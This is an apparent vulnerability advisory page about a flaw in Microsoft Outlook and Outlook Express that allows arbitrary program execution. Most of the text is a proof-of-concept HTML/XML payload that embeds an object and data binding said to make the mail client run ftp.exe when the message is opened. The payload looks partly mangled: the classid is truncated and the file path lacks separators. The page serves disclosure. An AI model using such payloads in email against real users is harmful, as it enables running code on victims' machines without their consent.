Microsoft Outlook and Outlook Express Arbitrary Program Execution Vulnerability

info
discussion
exploit
solution
references

Microsoft Outlook and Outlook Express Arbitrary Program Execution Vulnerability

Embedding the following object in an HTML message will reportedly cause ftp.exe to be executed:

<xml id=oExec> <security><exploit> <![CDATA[ <object id="oFile"
classid="clsid:11111111-1111-1111-1111"
code base="C:WINDOWSFTP.EXE"></object>]]></exploit></security></xml>
<SPAN dataFld=exploit dataFormatAs=html
dataSrc=#oExec></SPAN>